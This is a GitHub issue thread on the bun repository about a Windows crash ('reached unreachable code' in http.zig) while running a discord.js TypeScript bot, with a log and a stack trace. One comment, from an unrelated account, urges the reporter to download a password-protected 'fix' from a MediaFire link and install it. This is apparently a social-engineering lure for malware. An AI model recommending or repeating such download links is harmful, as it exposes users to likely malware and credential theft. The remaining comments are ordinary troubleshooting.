### ISSUE TITLE
Crash when running discord.js bot using typescript

### ISSUE THREAD

**Issue by travisfriesen** [oven-sh/bun#13560]
### How can we reproduce the crash?

i was just running the program using 'bun run index.ts' and by waiting it crashes

### Relevant log output

```shell
Bun v1.1.12 (43f0913c) Windows x64
Args: "C:\Users\me\.bun\bin\bun.exe" "run" "index.ts"
Features: jsc Bun.stdin(2) dotenv fetch(23) transpiler_cache(3) tsconfig(4) WebSocket 
Builtins: "bun:main" "node:buffer" "node:events" "node:fs" "node:fs/promises" "node:http" "node:path" "node:string_decoder" "node:timers" "node:timers/promises" "node:url" "node:util" "node:util/types" "node:zlib" "node:worker_threads" "undici" "ws" 
Elapsed: 651466ms | User: 156ms | Sys: 109ms
RSS: 0.14GB | Peak: 0.19GB | Commit: 0.16GB | Faults: 184644
```

### Stack Trace (bun.report)

Bun v1.1.12 ([`43f0913`](<https://github.com/oven-sh/bun/tree/43f0913c3875cbf260c60868268adc5953b09a80>)) on windows x86_64 [BunxCommand]

**panic**: reached unreachable code

- [`http.zig:1616`](<https://github.com/oven-sh/bun/blob/43f0913c3875cbf260c60868268adc5953b09a80/src/http.zig#L1616>): `isCompressed`
- `??`
- `uv__process_poll_req`
- `??`
- `uv_run`
- [`http.zig:840`](<https://github.com/oven-sh/bun/blob/43f0913c3875cbf260c60868268adc5953b09a80/src/http.zig#L840>): `processEvents`
- [`http.zig:757`](<https://github.com/oven-sh/bun/blob/43f0913c3875cbf260c60868268adc5953b09a80/src/http.zig#L757>): `onStart`

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by travisfriesen** [comment]
I'm going to update and see if that resolves it,

**Comment by tobycm** [comment]
Any chance I can get a snippet to repro this?
